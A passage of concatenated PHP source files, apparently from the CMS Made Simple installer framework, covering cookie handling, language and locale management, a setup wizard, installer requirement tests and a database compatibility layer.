                    && (empty($cookie['secure']) || $urlParsed['protocol'] == 'https'))
                {
                    $tempCookies[$cookie['name']][strlen($cookie['path'])] = $cookie['value'];
                }
            }

            // cookies with longer paths go first
            foreach ($tempCookies as $name => $values)
            {
                krsort($values);
                foreach ($values as $value)
                {
                    $this->addCookie($name, $value);
                }
            }
        }
    }

    /**
    * Checks if cookie domain matches a request host (internal)
    *
    * Cookie domain can begin with a dot, it also must contain at least
    * two dots.
    *
    * @param string Request host
    * @param string Cookie domain
    * @return bool Match success
     * @access private
    */
    function _domainMatch($requestHost, $cookieDomain)
    {
        if ('.' != $cookieDomain[0])
        {
            return $requestHost == $cookieDomain;
        }
        elseif (substr_count($cookieDomain, '.') < 2)
        {
            return false;
        }
        else
        {
            return substr('.'. $requestHost, - strlen($cookieDomain)) == $cookieDomain;
        }
    }

    /**
     * Tokenize String (internal)
     *
     * Tokenize string for various internal usage. Omit the second parameter
     * to tokenize the previous string that was provided in the prior call to
     * the function.
     *
     * @param string The string to tokenize
     * @param string The seperator to use
     * @return string Tokenized string
     * @access private
     */
    function _tokenize($string, $separator = '')
    {
        if(!strcmp($separator, ''))
        {
            $separator = $string;
            $string = $this->nextToken;
        }

        for($character = 0, $characterMax = strlen($separator); $character < $characterMax; $character++)
        {
            if(gettype($position = strpos($string, $separator[$character])) == "integer")
            {
                $found = (isset($found) ? min($found, $position) : $position);
            }
        }

        if(isset($found))
        {
            $this->nextToken = substr($string, $found + 1);
            return(substr($string, 0, $found));
        }
        else
        {
            $this->nextToken = '';
            return($string);
        }
    }

    /**
     * Set error message (internal)
     *
     * @param string Error message
     * @return string Error message
     * @access private
     */
    function _setError($error)
    {
        if ($error != '')
        {
            $this->error = $error;
            return $error;
        }
    }
}

?>
<?php

namespace __appbase;

class langtools_Exception extends \Exception {}

class langtools
{
  const DFLT_REALM = '__:DFLT:__';
  private static $_instance;
  private $_allowed_languages;
  private $_dflt_language;
  private $_cur_language;
  private $_langdata;
  private $_realm = '__:DFLT:__';

  protected function __construct() {}

  public static function &get_instance()
  {
    if( !is_object(self::$_instance) ) self::$_instance = new langtools();
    return self::$_instance;
  }


  public static function set_translator(langtools &$obj)
  {
    self::$_instance = $obj;
  }


  /**
   * Get the language(s) that the browser allows
   *
   * @return array of hashes.  Each element of the array will have members lang, and priority, where priority is between 0 and 1
   */
  final public static function get_browser_langs()
  {
    $request = request::get();
    $langs = $request->accept_language();
    $tmp = explode(',',$langs);

    $out = array();
    for( $i = 0; $i < count($tmp); $i++ ) {
      $tmp2 = explode(';q=',$tmp[$i],2);
      if( $tmp2[0] == '' || $tmp2[0] == '*' ) continue;
      $priority = 1;
      if( isset($tmp2[1]) && $tmp2[1] != '' ) $priority = floatval($tmp2[1]);
      $out[] = array('lang'=>$tmp2[0],'priority'=>$priority);
    }

    // todo: sort by priority.
    return $out;
  }


  /**
   * Test if a language is available
   *
   * @param string The language naem
   * @return boolean
   */
  final public function language_available($str)
  {
    $tmp = nlstools::get_instance()->find($str);
    if( is_object($tmp) ) return TRUE;
    return FALSE;
  }


  /**
   * Get the list of available languages
   *
   * @return array of available languages
   */
  final public function get_available_languages()
  {
    die('not implemented');
  }


  /**
   * Set the allowed languages.
   *
   * @param mixed String of comma delimited languages, or array of languages
   * @return void
   */
  final public function set_allowed_languages($data)
  {
    if( !is_array($data) ) $data = explode(',',$data);

    $out = array();
    for( $i = 0; $i < count($data); $i++ ) {
      if( $this->language_available($data[$i]) )  $out[] = $data[$i];
    }

    if( count($out) == 0 ) throw new langtools_Exception('set_allowed_languages no matches with available languages');

    $this->_allowed_languages = $out;
  }


  /**
   * Get list of allowed languages
   *
   * @return array of language strings
   */
  final public function get_allowed_languages()
  {
    return $this->_allowed_languages;
  }


  /**
   * Test if a language is allowed
   *
   * @param string language string
   * @return boolean TRUE if no allowed languages are set, TRUE if the specified language is allowed, false if not in the allowed list.
   */
  final public function language_allowed($str)
  {
    if( is_array($this->_allowed_languages) && count($this->_allowed_languages) ) {
      if( in_array($str,$this->_allowed_languages) ) return TRUE;
      return FALSE;
    }
    return TRUE;
  }


  /**
   * Find the first allowed language that the browser supports
   *
   * @return mixed lang string, or null
   */
  final public function match_browser_lang()
  {
    $langs = $this->get_browser_langs();
    if( is_array($langs) && count($langs) ) {
      for( $i = 0; $i < count($langs); $i++ ) {
	$obj = nlstools::get_instance()->find($langs[$i]['lang']); // does alias lookup.
	if( $obj ) {
	  // it's available... now check if it's allowed.
	  if( $this->language_allowed($obj->name()) ) return $obj->name();
	}
      }
    }
  }


  /**
   * Set the default language
   * Throws an exception if the specified language is not available, or not allowed.
   *
   * @param string language name.
   * @return void
   */
  final public function set_default_language($str)
  {
    if( !$this->language_available($str) || !$this->language_allowed($str) ) {
      throw new langtools_Exception('default language is not in list of allowed langages');
    }

    $this->_dflt_language = $str;
  }


  /**
   * Get the default language
   * Throws an exception of no default language has been set.
   *
   * @return string
   */
  final public function get_default_language()
  {
    if( !$this->_dflt_language ) throw new langtools_Exception('cannot get the default language, if it is not set');

    return $this->_dflt_language;
  }


  /**
   * Get the users selected language.  May use advanced methods to store the users selected language
   * or retrieve it from cookies, session variables, or the request.
   *
   * @virtual
   * @return string
   */
  public function get_selected_language()
  {
    $request = request::get();
    $session = session::get();

    // get the users preferred language.
    $lang = null;
    if( isset($request['curlang']) ) $lang = $request['curlang']; // it's stored in the get (or post)
    if( !$lang && isset($session['current_language']) )	$lang = $session['current_language']; // it's stored in the session
    if( !$lang ) $lang = $this->match_browser_lang(); // not set anywhere. get it from the browser.

    // match available languages.
    return $lang;
  }


  /**
   * Set the current language
   * Throws a new exception if the specified language is not available or allowed
   * This method sets the 'current' language, and also updates the locale for the selected language.
   *
   * @virtual
   * @param string the requested language
   */
  public function set_current_language($str)
  {
    if( !$this->language_available($str) || !$this->language_allowed($str) ) {
      throw new langtools_Exception('default language is not in list of allowed langages');
    }

    $this->_cur_language = $str;
    $obj = nlstools::get_instance()->find($str);
    $locale = $obj->locale();
    if( !is_array($locale) ) $locale = explode(',',$locale);
    $old = setlocale(LC_ALL,'0');
    $tmp = setlocale(LC_ALL,$locale);
    if( $tmp === FALSE ) setlocale(LC_ALL,$old);
  }


  /**
   * Get the current language
   * Throws an exception if the current language and the default language has not been set
   *
   * @virtual
   * @returns string The current language, if set, otherwise the default language.
   */
  public function get_current_language()
  {
    if( !$this->_cur_language ) {
      if( !$this->_dflt_language ) throw new langtools_Exception('cannot get language, no default set');
      return $this->_dflt_language;
    }
    return $this->_cur_language;
  }

  /**
   * Get a hash of languages suitable for display in a dropdown
   *
   * @virtual
   * @returns a hash
   */
  public function get_language_list($langs)
  {
    $outp = null;
    foreach( $langs as $one ) {
      $tmp = nls()->find($one);
      if( !is_object($tmp) ) continue;

      if( !is_array($outp) ) $outp = array();
      $outp[$one] = $tmp->display();
    }
    return $outp;
  }

  /**
   * Set the selected language
   * This method may store the selected language in the session, or a cookie etc.
   *
   * @virtual
   * @param string The user selected language
   */
  public function set_selected_language($str)
  {
    if( !$this->language_available($str) ) throw new langtools_Exception('cannot set selected language to a language that is not available');
    if( !$this->language_allowed($str) ) throw new langtools_Exception('cannot set selected language to a language that is not allowed');

    $session = session::get();
    $session['current_language'] = $str;
    $this->set_current_language($str);
  }

  /**
   * Set the language realm
   *
   * @param string the realm name, if empty the default realm will be used.
   */
  final public function set_realm($str = '')
  {
    if( !$str ) $str = self::DFLT_REALM;
    $this->_realm = $realm;
  }

  /**
   * Return the current realm name
   *
   * @return string
   */
  final public function get_realm()
  {
    return $this->_realm;
  }


  /**
   * Return the absolute path to the language directory.
   * Throws an exception if the realm directory does not exist.
   *
   * @param string The realm name.  If empty, the default realm can be assumed.
   * @returns string
   */
  public function get_lang_dir($realm = '')
  {
    if( !$realm ) $realm = self::DFLT_REALM;
    if( $realm == self::DFLT_REALM ) $realm = 'app';
    $dir = app::get_appdir()."/lang/$realm";
    if( !is_dir($dir) )	throw new langtools_Exception('Language directory '.$dir.' not found');

    return $dir;
  }


  /**
   * Load a language realm.
   *
   * @param string, The realm name.  If empty the default realm is assumed.
   * @return array of translated lang strings.
   */
  public function load_realm($realm = '')
  {
    // load the realm.
    $fns = array();
    $fns[] = $this->get_lang_dir($realm)."/en_US.php";
    $fns[] = $this->get_lang_dir($realm)."/ext/".$this->get_current_language().'.php';
    $fns[] = $this->get_lang_dir($realm)."/custom/".$this->get_current_language().'.php';

    $lang = array();
    foreach( $fns as $fn ) {
      if( file_exists($fn) ) include_once($fn);
    }

    return $lang;
  }

  /**
   * Unload the realm
   *
   * @param string, The realm name. If empty, the default realm is assumed.
   */
  public function unload_realm($realm = '')
  {
    if( !$realm ) $realm = self::DFLT_REALM;
    if( isset($this->_langdata[$realm]) ) unset($this->_langdata[$realm]);
  }

  /**
   * Translate a string
   * uses the current realm, and the currently selected language.
   *
   * @param mixed - uses sprintf formatting,
   * @return string
   */
  public function translate()
  {
    $args = func_get_args();
    if( count($args) == 0 ) return;
    if( count($args) == 1 && is_array($args[0]) ) $args = $args[0];

    if( !$this->_langdata ) $this->_langdata = array();
    if( !isset($this->_langdata[$this->_realm]) ) $this->_langdata[$this->_realm] = $this->load_realm($this->_realm);

    // check to see if the key is available.
    $key = array_shift($args);
    if( !$key ) return;

    if( !isset($this->_langdata[$this->_realm][$key]) ) {
      return '-- Missing Languagestring - '.$key.' --';
    }
    else if( count($args) ) {
      return vsprintf($this->_langdata[$this->_realm][$key], $args);
    }
    else {
      return $this->_langdata[$this->_realm][$key];
    }
  }
} // end of class


function lang()
{
  try {
    $args = func_get_args();
    return langtools::get_instance()->translate($args);
  }
  catch( Exception $e ) {
    // nothing here.
  }
}

?><?php

namespace __appbase;

abstract class nls
{
  protected $_name;
  protected $_isocode;
  protected $_locale;
  protected $_fullname;
  protected $_encoding;
  protected $_aliases;
  protected $_display;

  abstract public function __construct();

  public function matches($str)
  {
    if( $str == $this->name() ) return TRUE;
    if( $str == $this->locale() ) return TRUE;
    if( $str == $this->isocode() ) return TRUE;
    if( $str == $this->fullname() ) return TRUE;
    $aliases = $this->aliases();
    if( !\is_array($aliases) ) $aliases = \explode(',', $aliases);
    if(\is_array($aliases) && \count($aliases) )
      {
	for($i = 0, $iMax = \count($aliases); $i < $iMax; $i++ )
	  {
	    if( $aliases[$i] == $str ) return TRUE;
	  }
      }
    return FALSE;
  }

  public function name()
  {
    $name = __CLASS__;
    if( endswith($name,'_nls') )
      {
	$name = \substr($name, 0, -4);
      }
    return $name;
  }

  public function isocode()
  {
    if( !$this->_isocode )
      {
	return \substr($this->name, 0, 2);
      }
    return $this->_isocode;
  }

  public function display()
  {
    if( !$this->_display )
      {
	return $this->fullname();
      }
    return $this->_display;
  }

  public function locale()
  {
    if( !$this->_locale )
      return $this->name();
    return $this->_locale;
  }

  public function encoding()
  {
    if( !$this->_encoding )
      return 'UTF-8';
    return $this->_encoding;
  }

  public function fullname()
  {
    if( !$this->_fullname ) return $this->name();
    return $this->_fullname;
  }

  public function aliases()
  {
    if( $this->_aliases )
      {
	if( \is_array($this->_aliases) )
	  return $this->_aliases;
	return \explode(',', $this->_aliases);
      }
  }

} // end of class
?><?php

namespace __appbase;

class nlstools
{
  private static $_instance;
  private $_nls;

  protected function __construct() {}

  public static function &get_instance()
  {
    if( !self::$_instance ) self::$_instance = new nlstools();
    return self::$_instance;
  }

  public static function set_nlshandler(nlstools &$obj)
  {
    self::$_instance = $obj;
  }

  protected function get_nls_dir()
  {
    return app::get_rootdir().'/lib/nls';
  }

  protected function load_nls()
  {
    if( is_array($this->_nls) ) return;

    $rdi = new \RecursiveDirectoryIterator($this->get_nls_dir());
    $rii = new \RecursiveIteratorIterator($rdi);

    $this->_nls = array();
    foreach( $rii as $file => $info ) {
      if( !endswith($file,'.nls.php') ) continue;
      $name = basename($file);
      $name = trim(substr($name,6,strlen($name)-14)).'_nls';

      include($file);

      $tmp = __NAMESPACE__.'\\'.$name;
      $obj = new $tmp;
      if( !is_a($obj,__NAMESPACE__.'\nls') ) {
          unset($obj);
          continue;
      }
      $this->_nls[$name] = $obj;
    }
  }

  public function get_list()
  {
    $this->load_nls();
    return array_keys($this->_nls);
  }

  public function &find($str)
  {
    $this->load_nls();
    foreach( $this->_nls as $name => &$nls ){
      if( $str == $name ) return $nls;
      if( $nls->matches($str) ) return $nls;
    }
    $obj = null;
    return $obj;
  }
} // end of class

?>
<?php

namespace __appbase;

class wizard
{
  private static $_instance = null;
  private $_name = null;
  private $_stepvar = 's';
  private $_steps;
  private $_stepobj;
  private $_classdir;
  private $_namespace;
  private $_initialized;

  const STATUS_OK    = 'OK';
  const STATUS_ERROR = 'ERROR';
  const STATUS_BACK  = 'BACK';
  const STATUS_NEXT  = 'NEXT';

  private function __construct($classdir,$namespace)
  {
    $this->_namespace = $namespace;
    if( !is_dir($classdir) ) throw new \Exception('Could not find wizard steps in '.$classdir);

    $this->_classdir = $classdir;
    $this->_name = basename($classdir);

  }

  final public static function &get_instance($classdir = '', $namespace = '')
  {
    if( !self::$_instance ) self::$_instance = new wizard($classdir,$namespace);
    return self::$_instance;
  }

  private function _init()
  {
      if( $this->_initialized ) return;
      $this->_initialized = true;

      // find all of the classes in the wizard directory.
      $di = new \DirectoryIterator($this->_classdir);
      $ri = new \RegexIterator($di,'/^class\.wizard.*\.php$/');
      $files = array();
      foreach( $ri as $one ) {
          $files[] = $one->getFilename();
      }
      if( !count($files) ) throw new \Exception('Could not find wizard steps in '.$classdir);
      sort($files);

      $_data = array();
      for( $i = 0; $i < count($files); $i++ ) {
          $idx = $i+1;
          $filename = $files[$i];
          $classname = substr($filename,6,strlen($filename)-10);
          $rec = array('fn'=>$filename,'class'=>'','name'=>'','description'=>'','active'=>'');
          $fullclass = $classname;

          if( $this->_namespace ) $fullclass = $this->_namespace.'\\'.$classname;
          $rec['classname'] = $classname;
          $rec['class'] = $fullclass;
          $rec['active'] = ($idx == $this->cur_step())?1:0;
          $_data[$idx] = $rec;
      }
      $this->_steps = $_data;
  }

  final public function get_nav()
  {
    $this->_init();
    return $this->_steps;
  }

  final public function get_step_var()
  {
    return $this->_stepvar;
  }

  final public function set_step_var($str)
  {
    if( $str ) $this->_stepvar = $str;
  }

  final public function cur_step()
  {
    $val = 1;
    if( $this->_stepvar && isset($_GET[$this->_stepvar]) ) $val = (int)$_GET[$this->_stepvar];
    return $val;
  }

  final public function finished()
  {
    $this->_init();
    return $this->cur_step() > $this->num_steps();
  }

  final public function num_steps()
  {
    $this->_init();
    return count($this->_steps);
  }

  final public function &get_step()
  {
    $this->_init();
    if( is_object($this->_stepobj) ) return $this->_stepobj;

    $rec = $this->_steps[$this->cur_step()];
    if( isset($rec['class']) && class_exists($rec['class']) ) {
      $obj = new $rec['class'];
      if( is_object($obj) ) {
	$this->_stepobj = $obj;
	return $obj;
      }
    }
  }

  public function get_data($key,$dflt = null)
  {
      $sess = session::get();
      if( !isset($sess[$key]) ) return $dflt;
      return $sess[$key];
  }

  public function set_data($key,$value)
  {
      $sess = session::get();
      $sess[$key] = $value;
  }

  public function clear_data($key)
  {
      $sess = session::get();
      if( isset($sess[$key]) ) unset($sess[$key]);
  }

  public function process()
  {
      $this->_init();
      $res = $this->get_step()->run();
      return $res;
  }

  final public function step_url($idx)
  {
    $this->_init();
    
    // get the url to the specified step index
    $idx = (int)$idx;
    if( $idx < 1 || $idx > $this->num_steps() ) return '';
    
    $request = request::get();
    $url = $request->raw_server('REQUEST_URI');
    $urlmain = \explode('?', $url);
    
    \parse_str($url, $parts);
    \array_shift($parts);
    $parts[$this->_stepvar] = $idx;
    
    $tmp = [];
    foreach($parts as $k => $v) { $tmp[] = $k . '=' . $v; }
    $url = $urlmain[0].'?' . \implode('&', $tmp);
    return $url;
  }
  
  final public function next_url()
  {
    $this->_init();
    $request = request::get();
    $url     = $request->raw_server('REQUEST_URI');
    
    $urlmain = \explode('?', $url);
    
    \parse_str($url, $parts);
    $parts[$this->_stepvar] = $this->cur_step() + 1;
    
    if($parts[$this->_stepvar] > $this->num_steps()) { return ''; }
    
    \array_shift($parts);
    
    $tmp = [];
    foreach($parts as $k => $v) { $tmp[] = $k . '=' . $v; }
    
    $url = $urlmain[0] . '?' . \implode('&', $tmp);
    
    return $url;
  }

  final public function prev_url()
  {
    $this->_init();
    $request = request::get();
    $url = $request->raw_server('REQUEST_URI');
    $urlmain = \explode('?', $url);

    \parse_str($url, $parts);
    $parts[$this->_stepvar] = $this->cur_step() - 1;
    if( $parts[$this->_stepvar] <= 0 ) { return ''; }

    $tmp = [];
    if(\count($parts))
    {
      \array_shift($parts);
      
      foreach($parts as $k => $v) { $tmp[] = $k . '=' . $v; }
    }
    
    $url = $urlmain[0].'?' . \implode('&', $tmp);
    
    return $url;
  }

} // end of class
?>
<?php

namespace __appbase;

abstract class wizard_step
{
  public function __construct() {
    //echo 'DEBUG: create wizard step<br/>';
  }

  /**
   * Process the results of this step's form (POST only)
   */
  abstract protected function process();

  /**
   * Display information for this step
   */
  abstract protected function display();

  public function get_name() { return \get_class($this); }
  public function get_description() { return null; }

  public function get_wizard()
  {
    return wizard::get_instance();
  }

  public function cur_step()
  {
    return wizard::get_instance()->cur_step();
  }

  public function run()
  {
    $request = request::get();
    if( $request->is_post() ) $res = $this->process();
    $this->display();
    return wizard::STATUS_OK;
  }
} // end of class

?><?php

namespace __appbase\tests;

class boolean_test extends test_base
{
  private $_data = [];

  public function __construct($name,$value)
  {
    $value = (bool)$value;
    parent::__construct($name,$value);
  }

  public function execute()
  {
    $val = \__appbase\utils::to_bool($this->value);
    if( $val ) return self::TEST_PASS;
    return self::TEST_FAIL;
  }
}
<?php

namespace __appbase\tests;

class informational_test extends test_base
{
  /**
   * @var mixed|string
   */
  protected $msg_key;
  
  public function __construct($name, $value, $message = '', $key = '')
  {
    parent::__construct($name,$value,$key);
    if( $message )
      {
	$this->msg_key = $message;
      }
  }

  /**
   * Execute the test
   *
   * @return integer -1 for fail
   */
  public function execute() {}
} // end of class

?><?php

namespace __appbase\tests;

class matchall_test extends test_base
{
    private $_children;

    public function __construct($name)
    {
        parent::__construct($name,'');
    }

    public function add_child(test_base $obj)
    {
        if( !\is_array($this->_children) ) $this->_children = [];
        $this->_children[] = $obj;
    }


    public function __set($key,$value)
    {
        switch( $key ){
        case 'minimum':
        case 'maximum':
        case 'recommended':
        case 'success_key':
        case 'pass_key':
        case 'fail_key':
            $this->$key = $value;
            break;

        default:
            parent::__set($key,$value);
        }
    }

    public function execute()
    {
        $out = self::TEST_PASS;
        if( \count($this->_children) ) {
          foreach($this->_children as $iValue)
          {
              $res = $iValue->run();
              if( $res == self::TEST_FAIL ) {
                  // test failed.... if this test is not required, we can continue
                  if( $this->required ) return $res;
                  $out = self::TEST_WARN;
              }
          }
        }
        return $out;
    }
  
  /**
   * @throws \Exception
   */
  public function msg()
    {
        switch( $this->status ) {
        case self::TEST_FAIL:
            foreach($this->_children as $iValue)
            {
                $obj = $iValue;
                if( $obj->status == self::TEST_FAIL ) {
                    if( $obj->fail_msg ) return $obj->fail_msg;
                    if( $obj->fail_key ) return \__appbase\lang($obj->fail_key);
                }
            }
        break;

        case self::TEST_WARN:
          foreach($this->_children as $iValue)
          {
              $obj = $iValue;
              if( $obj->status == self::TEST_FAIL ) {
                  if( $obj->warn_msg ) return $obj->warn_msg;
                  if( $obj->warn_key ) return \__appbase\lang($obj->warn_key);
              }
          }
        }

        return parent::msg();
    }
} // end of class

?><?php

namespace __appbase\tests;

class matchany_test extends test_base
{
  private $_children;

  public function __construct($name)
  {
    parent::__construct($name,'');
  }

  public function add_child(test_base $obj) : void
  {
    if( !\is_array($this->_children) )
      $this->_children = [];

    $this->_children[] = $obj;
  }

  public function __set($key,$value)
  {
    switch( $key )
      {
      case 'minimum':
      case 'maximum':
      case 'recommended':
      case 'success_key':
      case 'pass_key':
      case 'fail_key':
	$this->$key = $value;
	break;

      default:
	parent::__set($key,$value);
      }
  }
  
  
  public function execute()
  {
    if(\count($this->_children))
    {
      foreach($this->_children as $iValue)
      {
        $res = $iValue->execute();
        if($res == self::TEST_PASS)
        {
          return self::TEST_PASS;
        }
      }
    }
    
    return self::TEST_FAIL;
  }
}

?><?php

namespace __appbase\tests;

class range_test extends test_base
{
  public function __construct($name,$value)
  {
      parent::__construct($name,$value);
  }


  public function __set($key,$value)
  {
      switch( $key )
      {
      case 'minimum':
      case 'maximum':
          $this->$key = $value;
          break;

      default:
          parent::__set($key,$value);
      }
  }


  public function execute()
  {
      if( $this->minimum )
      {
          $min = $this->returnBytes($this->minimum);
          $val = $this->returnBytes($this->value);
          if( $val < $min ) return self::TEST_FAIL;
      }
      if( $this->recommended )
      {
          $rec = $this->returnBytes($this->recommended);
          $val = $this->returnBytes($this->value);
          if( $val < $rec ) return self::TEST_WARN;
      }
      if( $this->maximum )
      {
          $max = $this->returnBytes($this->maximum);
          $val = $this->returnBytes($this->value);
          if( $val > $max ) return self::TEST_FAIL;
      }
      return self::TEST_PASS;
  }
}

?><?php

namespace __appbase\tests;

function test_extension_loaded($name) : bool
{
  $a = \extension_loaded(\strtoupper($name));
  $b = \extension_loaded(\strtoupper($name));
  return $a || $b;
}


function test_apache_module($name)
{
  if( !$name ) return FALSE;
  if( !\function_exists('apache_get_modules') ) return FALSE;
  $modules = \apache_get_modules();
  if( \in_array($name, $modules) ) return TRUE;
  return FALSE;
}


function test_is_false($val)
{
  return (FALSE == \__appbase\utils::to_bool($val));
}


function test_is_true($val)
{
  return (TRUE == \__appbase\utils::to_bool($val));
}


function test_remote_file($url,$timeout = 3,$searchString = '') : bool
{
  $timeout = \max(1, \min(360, $timeout));
  $req = new \__appbase\http_request;
  $req->setTarget($url);
  $req->setTimeout($timeout);
  $req->execute();
  if(200 != $req->getStatus()) return FALSE;
  if( $searchString && FALSE === \strpos($req->getResult(), $searchString)) return FALSE;
  return TRUE;
}

#[\AllowDynamicProperties]
abstract class test_base
{
  const TEST_UNTESTED = 'test_untested';
  const TEST_PASS     = 'test_pass';
  const TEST_FAIL     = 'test_fail';
  const TEST_WARN     = 'test_warn';

  private static $_keys = [
    'name', 'name_key', 'status', 'value', 'required', 'minimum', 'maximum', 'recommended', 'pass_key', 'pass_msg', 'fail_msg',
    'fail_key', 'warn_key', 'warn_msg', 'msg_key', 'msg'
  ];
  private $_data = [];

  public function __construct($name,$value,$key = '')
  {
    if( !$name ) throw new \RuntimeException(\__appbase\lang('error_test_name'));
    $this->name = $name;
    $this->name_key = $name;
    $this->value = $value;
    if( $key ) $this->name_key = $key;
    $this->status = self::TEST_UNTESTED;
    $this->required = 0;
  }

  public function __get($key)
  {
    if( !\in_array($key, self::$_keys) ) throw new \RuntimeException(\__appbase\lang('error_invalidkey', $key, __CLASS__));
    if( isset($this->_data[$key]) ) return $this->_data[$key];
  }

  public function __isset($key)
  {
    if( !\in_array($key, self::$_keys) ) throw new \RuntimeException(\__appbase\lang('error_invalidkey', $key, __CLASS__));
    return isset($this->_data[$key]);
  }

  public function __set($key,$value)
  {
    if( !\in_array($key, self::$_keys) ) throw new \RuntimeException(\__appbase\lang('error_invalidkey', $key, __CLASS__));
    if(NULL === $value || '' === $value)
    {
      unset($this->_data[$key]);
      
      return;
    }

    $this->_data[$key] = $value;
  }

  public function __unset($key)
  {
    if( !\in_array($key, self::$_keys) ) throw new \RuntimeException(\__appbase\lang('error_invalidkey', $key, __CLASS__));
    unset($this->_data[$key]);
  }

  abstract public function execute();

  public function run()
  {
    $res = $this->execute();
    switch( $res ) {
    case self::TEST_PASS:
    case self::TEST_FAIL:
    case self::TEST_WARN:
      $this->status = $res;
      break;

    case self::TEST_UNTESTED:
    default:
      throw new \RuntimeException(\__appbase\lang('error_test_invalidresult') . ' ' . $res);
    }

    return $this->status;
  }

  public function msg()
  {
    if( $this->msg ) return $this->msg;
    if( $this->msg_key ) return $this->msg_key;

    switch( $this->status ) {
    case self::TEST_PASS:
      if( $this->pass_msg ) return $this->pass_msg;
      if( $this->pass_key ) return \__appbase\lang($this->pass_key);
      break;

    case self::TEST_FAIL:
      if( $this->fail_msg ) return $this->fail_msg;
      if( $this->fail_key ) return \__appbase\lang($this->fail_key);
      break;

    case self::TEST_WARN:
      if( $this->warn_msg ) return $this->warn_msg;
      if( $this->warn_key ) return \__appbase\lang($this->warn_key);
      break;

    default:
      throw new \Exception(\__appbase\lang('error_test_invalidstatus'));
    }
  }

  protected function returnBytes($val)
  {
      if(\is_string($val) && '' != $val) {
          $val = \trim($val);
          $last = \strtolower(\substr($val, -1));
          $val = (float) \substr($val, 0, -1);
          switch($last) {
          case 'g':
              $val *= 1024.0;
          case 'm':
              $val *= 1024.0;
          case 'k':
              $val *= 1024.0;
          }
      }

      return $val;
  }
} // end of class

?><?php

namespace __appbase\tests;

class version_range_test extends test_base
{
  public function __construct($name,$value)
  {
    parent::__construct($name,$value);
  }

  public function __set($key,$value)
  {
    switch( $key )
      {
      case 'minimum':
      case 'maximum':
      case 'recommended':
      case 'success_key':
      case 'pass_key':
      case 'fail_key':
	$this->$key = $value;
	break;

      default:
	parent::__set($key,$value);
      }
  }

  public function execute()
  {
    // make sure we have all of the information.
    // do the test
    // set the result.
    if( $this->minimum ) {
      if(\version_compare($this->value, $this->minimum) < 0 ) return self::TEST_FAIL;
    }
    if( $this->maximum ) {
      if(\version_compare($this->value, $this->maximum) > 0 ) return self::TEST_FAIL;
    }
    if( $this->recommended ) {
      if(\version_compare($this->value, $this->recommended) < 0 ) return self::TEST_WARN;
    }
    return self::TEST_PASS;
  }
}

?><?php

namespace __appbase\tests;

// just like a boolean test, but uses TEST_WARN installed of TEST_FAIL
class warning_test extends test_base
{
  private $_data = [];

  public function __construct($name,$value)
  {
    $value = (bool)$value;
    parent::__construct($name,$value);
  }

  public function execute()
  {
    $val = \__appbase\utils::to_bool($this->value);
    if( $val ) return self::TEST_PASS;
    return self::TEST_WARN;
  }
}
<?php
#BEGIN_LICENSE
#-------------------------------------------------------------------------
# Module: CMSMS\Database\compatibility (c) 2015 by Robert Campbell
#         (calguy1000@cmsmadesimple.org)
# A collection of compatibility tools for the database connectivity layer.
#
#-------------------------------------------------------------------------
# CMS - CMS Made Simple is (c) 2005 by Ted Kulp (wishy@cmsmadesimple.org)
# Visit our homepage at: http://www.cmsmadesimple.org
#
#-------------------------------------------------------------------------
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# However, as a special exception to the GPL, this software is distributed
# as an addon module to CMS Made Simple.  You may not use this software
# in any Non GPL version of CMS Made simple, or in any version of CMS
# Made simple that does not indicate clearly and obviously in its admin
# section that the site was built with CMS Made simple.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Or read it online: http://www.gnu.org/licenses/licenses.html#GPL
#
#-------------------------------------------------------------------------
#END_LICENSE

/**
 * This file contains some database connectivity tools.
 *
 * @package CMS
 */

namespace CMSMS\Database {

    /**
     * A class for providing some compatibility functionality with older module code
     *
     * @todo: move this class to a different function and rename.
     */
    final class compatibility
    {
        /**
         * @ignore
         */
        private function __construct() {}

        /**
         * Initialize the database connection according to config settings.
         *
         * @internal
         * @param cms_config $config The config object
         * @return \CMSMS\Database\Connection
         */
        public static function init(\cms_config $config)
        {
            $spec = new ConnectionSpec;
            $spec->type = $config['dbms'];
            $spec->host = $config['db_hostname'];
            $spec->username = $config['db_username'];
            $spec->password = $config['db_password'];
            $spec->dbname = $config['db_name'];
            $spec->port = $config['db_port'];
            $spec->debug = CMS_DEBUG;

            $tmp = [];
            if( $config['set_names'] ) $tmp[] = "NAMES 'utf8'";
            if( $config['set_db_timezone'] ) {
                $dt = new \DateTime();
                $dtz = new \DateTimeZone($config['timezone']);
                $offset = timezone_offset_get($dtz,$dt);
                $symbol = ($offset < 0) ? '-' : '+';
                $hrs = abs((int)($offset / 3600));
                $mins = abs((int)($offset % 3600));
                $tmp[] = sprintf("time_zone = '%s%d:%02d'",$symbol,$hrs,$mins);
            }
            if( count($tmp) ) $spec->auto_exec = 'SET '.implode(',',$tmp);

            $obj = Connection::Initialize($spec);
            $obj->SetErrorHandler( '\\CMSMS\Database\\compatibility::on_error' );
            if( $spec->debug ) $obj->SetDebugCallback('debug_buffer');
            return $obj;
        }

        public static function on_error( Connection $conn, $errtype, $error_number, $error_msg )
        {
            debug_to_log("Database Error: $errtype($error_number) - $error_msg");
            debug_bt_to_log();
            if( !defined('CMS_DEBUG') || CMS_DEBUG == 0 ) return;
            \CmsApp::get_instance()->add_error(debug_display($error_msg, '', false, true));
        }

        /**
         * A static no-op function  that allows the autoloader to load this file
         */
        public static function noop()
        {
            // do nothing
        }
    } // end of class
} // end of namespace

namespace {
    // root namespace stuff

    /**
     * A constant to assist with date and time flags in the data dictionary.
     *
     * @name CMS_ADODB_DT
     */
    define('CMS_ADODB_DT','DT'); // backwards compatibility.

    /**
     * A method to create a new data dictionary object
     *
     * @param \CMSMS\Database\Connection $conn The existing database connection.
     * @return \CMSMS\Database\DataDictionary
     * @deprecated
     */
    function &NewDataDictionary(\CMSMS\Database\Connection $conn)
    {
        // called by module installation routines.
        return $conn->NewDataDictionary();
    }

    /**
     * A function co create a new adodb database connection.
     *
     * @param string $dbms
     * @param string $flags
     * @return \CMSMS\Database\Connection
     * @deprecated
     */
    function &ADONewConnection( $dbms, $flags )
    {
        // now that our connection object is stateless... this is just a wrapper
        // for our global db instance.... but should not be called.
